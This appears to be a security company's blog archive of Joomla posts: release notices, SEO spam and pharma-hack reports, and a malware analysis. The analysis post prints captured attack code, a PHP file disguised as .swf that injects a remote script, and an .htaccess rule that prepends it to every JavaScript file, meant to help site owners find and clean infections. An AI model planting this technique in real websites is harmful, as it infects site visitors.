Joomla Version 2.5.10 Released – Security Updates

April 24, 2013 by Leave a Comment

This morning the Joomla development team released a new version of the Joomla platform. This is a Security release, so please be sure to update if you’re on the 2.x branch. If you’re on the 1.x branch the odds of updating seamlessly is highly unlikely so please do so only if you’re engaging a developer to assist you.

This release address 7 security issues, all of them appear to be low to moderate and revolve around Cross-Site Scripting (XSS), Denial of Service (DOS) and Privilege Escalation. It also contains another 38 bug fixes.

Security Fixes include:

If you can, please be sure to update, you can get your latest releases off the Joomla website here.

Filed Under: awareness, joomla, sucuri, updates Tagged With: , , ,

When Good Plugins Go Bad – SEO Spam on Joomla Websites

April 10, 2013 by 3 Comments

We recently published an article about an interesting case where a very popular WordPress Plugin (Social Media Widget), with more than 900,000 downloads, got sold and the new owners decided to use their big audience and inject spam on all the sites using the plugin.

If you read the post, you will see how they went about injecting those “pay day loan” SPAM links to paydaypam.co.uk. What’s even more scary is that in one day, the number of backlinks to paydaypam.co.uk, increased from 0 to almost 450k, according to ahrefs.com:

Loan Spam

This gives you an idea of how big a targeted SEO Spam attack can be.


Read More

Filed Under: joomla, Malware, malware_updates, Spam, WordPress Tagged With: , , , ,

Website Malware – Fixing Joomla SPAM Hacks – Conditional Payloads

February 22, 2013 by 1 Comment

Our Senior Malware Engineer, Fioravante Cavallari, is at it again. I think he has made it his personal mission in life to expel all Joomla hacks, he loves them that much – true story.. ;)

In all seriousness, he found another gem yesterday. It’s well written; it includes comments explaining what they are doing, uses proper syntax, it was broken up and sprinkled throughout another good file generating no errors, it wasn’t obfuscated and it leverages good variable naming conventions. What more can we ask for, right?!?!?!

Don’t ask how we found it, a true gentlemen never discloses his nightly affairs.

The Pretty Payload – Nice Conditional Malware

A few months ago I wrote about Conditional Malware, we’d categorize this one into the same family. In my post it was a very simple explanation and code base, you could clearly see the IP’s being filtered and what it was doing, here we have to think a bit. Remember, you’re not likely to find it in tact like this, it’ll likely be broken and sprinkled through out your file. Here you go:

Read More

Filed Under: awareness, hacked, joomla, Malware, Spam, sucuri Tagged With: , , , ,

Sneaky Joomla Web Malware – JavaScript Infections

February 19, 2013 by 1 Comment

So the past week has been interesting, we have been having fun with a few JavaScript infections that really forced us to put on our thinking hats. Our Senior Malware Engineer, Fioravante Cavallari, actually found the payload and dissected it – thank goodness for products based on human-intelligence. It was so interesting that we felt compelled to write about it. It very accurately represents an evolution in the types of attacks we’re seeing, specifically as to the their creative nature.

If it were 24 months ago, JavaScript infections would be straight forward. They would be right in the JavaScript file, usually leveraging the document.write object or something similar. Take it back 12 months and we’d see the introduction of the rogue Apache modules, maybe not the introduction but when they were becoming more common place, generating the same injections. Granted, both of these approaches are still actively used today, but now we start adding things like the self-licking ice cream cone approach we wrote about and today’s scenario, which we’ll coin, adding junk to the trunk.

So What’s the Scenario?!?

In retrospect, it’s very simple. Append the payload to the file, hence adding junk to the trunk, similar in concept to what we are seeing with the Apache modules, but leveraging .htaccess.

This is how they are doing it:

First:

They have a payload on the server that is anything but the normal files you’d expect, i.e., HTML, JS, PHP, CSS, etc.., in this scenario it was a ShockWaveFile (.swf):

<?php
if (!$_COOKIE['utmzz'])
 {
setcookie('utmzz',time(),time()+60*60*24*7,'/');
header('Content-Type: application/x-javascript');
?>
document.write('<script type="text/javascript" src="[some not so nice payload]"></script>');
<?php
 }
header('Content-Type: application/x-javascript');

Second:

You then auto_append that rogue file to all JS files, oh which by the way, you treat as PHP:

<files ~ "\.js$">
SetHandler application/x-httpd-php
php_value auto_prepend_file [path to your rogue file]
php_flag display_errors Off
</files>

Keeping it Simple

Just like that, the attacker is able to append bad payloads to all your JavaScript files. All the while, you spend your valuable time looking through all your JS files, pulling your hair out, and low and behold, it’s not in the files. Yes, very annoying, I know. In any event, right now we’re seeing these types of attacks on Joomla sites more than any CMS.

I wouldn’t place too much thought into that, let’s keep the drama low folks. I don’t think it’s for any reason other than different breeds of attackers. Some groups are more particular to one platform over another and as they come up with tactics it spreads, at some point it jumps the fence and it’ll only be a matter of time before other platforms start seeing similar attack patterns.

Don’t Forget About Cache!!

When cleaning up the mess, removing the .htaccess and the bad rogue file alone won’t do the trick. It’s already been appended to all your files and in Joomla that means you have to use the core tools to purge all your files – easiest way. If you were to navigate to the site directly you, and your visitors, would still get hit with the JavaScript payload. So, log into your administrator panel and purge all the cached files via tools menu options.

Cheers!

If you find yourself in a similar situation send us a note at info@sucuri.net. Or sign up and we’ll get things situated, http://sucuri.net.

Filed Under: awareness, hacked, htaccess, joomla, Malware, research, sucuri

Website Malware – Sharp Increase in SPAM Attacks – WordPress & Joomla

December 14, 2012 by 12 Comments

This past week we have seen a sharp increase in the use of old tactics designed to poison your search engine results – also known as Search Engine Poisoning (SEP) attacks. If you use our free scanner, SiteCheck, you’ll likely see something like the following:

Sucuri - ViewState Infection

You’re probably wondering, what the heck, how is that SEO SPAM? Allow me to explain what this is doing.

Read More

Filed Under: awareness, joomla, Malware, malware cleanup, research, security, Spam, sucuri, WordPress Tagged With: , , , , ,

Website Malware – Joomla SEP Attack – Pharma Injection

November 29, 2012 by 3 Comments

This was a fun, yet painful case. In the past we have written a few different posts targeting search engine poisoning attacks (SEP) that like to use Pharmaceutical keywords and their associated links to poison your search engine results.

Today we had an interesting scenario where Google had not yet blacklisted the client, but our free scanner, SiteCheck, was in fact picking up the injection. From what we could see it was being triggered by a referrer but it wasn’t the typical referrers you’d expect, it’s condition was if it came from itself.

If you’re wondering why that is, allow me to explain. That meant that the payload would not show up the first time you visit the page, only when you visit the same page and the referrer was set to itself. This actually a very good evasive technique, it would make detection that much harder by most conventional scanners. In short, if the user clicks on the paeg once, it wouldn’t appear. This makes it very hard to detect and replicate unless you start testing every option. In this case, it wasn’t until you clicked on the option two consecutive times that the injections would appear.

You could try any other variation and it’d never work, only if you clicked on it two consecutive times. How annoying is that !!! This probably explains why Google and many others never picked it up.

In either event, this was a Joomla site and so the question was, where the heck is this thing.

Read More

Filed Under: awareness, joomla, Learn, Malware, malware cleanup, pharma, Spam Tagged With: , , , , ,

Joomla 2.5.8 and 3.0.2 Released (Security Updates)

November 8, 2012 by 2 Comments

Joomla 2.5.8 and 3.0.2 were just released today fixing a medium severity security bug related to a clickjacking/XSS vulnerability. You can find more details on their release notes:

If you are not familiar with ClickJacking, Wikipedia explains it well:

Clickjacking is a malicious technique of tricking a Web user into clicking on something different to what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. It is a browser security issue that is a vulnerability across a variety of browsers and platforms. A clickjack takes the form of embedded code or a script that can execute without the user’s knowledge, such as clicking on a button that appears to perform another function.

And remember, the leading cause for website compromises is outdated software! So as a website owner, you have to do your part to minimize risk and keep your site (and your users) safe. Update now!

Sucuri SiteCheck was also updated to alert users not running version 2.5.8/3.0.2 on their Joomla sites.

Filed Under: joomla, vulnerability Tagged With: ,

Joomla Pharma Hack – Web Malware Removal

November 6, 2012 by 2 Comments

In my last SEO poisoning post I wrote about some really nasty conditional malware. In this one, we’re going to revert our attention to the more common variation of the attack, and look at the Joomla CMS.

Joomla Pharma Hack

This variation will be the Pharma hack. As of late, it seems to be going on a rampage on a number of CMS applications and many of its characteristics are similar. The objective appears to be clear though, find its way into Google’s search engine result pages (SERP).

While we can only speculate, the idea is simple – The SERPs are a cached product and as long as they keep the injections benign of malware they increase their odds of bypassing detection until someone spots it and reports.

Read More

Filed Under: joomla, Malware, pharma, security, SiteCheck, Spam, sucuri Tagged With: , , , , ,

Joomla 2.5.7 Released (Security Update)

September 13, 2012 by 1 Comment

Joomla 2.5.7 was just released today fixing 2 low severity security bugs and added a few other improvements. As always, we recommend all our Joomla users to update to 2.5.7 as soon as they can.

From their announcement page, here are the security bugs fixed:

  • Low Priority – Core – XSS Vulnerability: Inadequate escaping of output leads to XSS vulnerability in language switcher module.
  • Low Priority – Core – XSS Vulnerability: Inadequate escaping of output leads to XSS vulnerability.

Remember, the leading cause for website compromises is outdated software! So as a website owner, you have to do your part to minimize risk and keep your site (and your users) safe. Update now!

Sucuri SiteCheck was also updated to alert users not running version 2.5.7 on their Joomla sites.

Filed Under: joomla, vulnerability Tagged With: ,

Joomla 2.5.5 released (security update)

June 18, 2012 by Leave a Comment

Joomla 2.5.5 was just released today, with a few bugs fixed and 2 important security updates for a privilege escalation and an information disclosure issue:

1- Privilege escalation

High severity security issue, that allows unprivileged users to get admin access to a site running Joomla.

2- Information Disclosure

This is a low severity security issue that leaks internal information about the database, internal paths and PHP info.

More information about this release here: Joomla 2.5.5 released

Remember, the leading cause for web site compromises is outdated software! So as a web site owner, you have to do your part to minimize risk and keep your site (and your users) safe. Update now!

Sitecheck was also updated to alert users not running version 2.5.5 on their Joomla sites.

Filed Under: joomla, security, updates, vulnerability Tagged With: , , ,
«Older Posts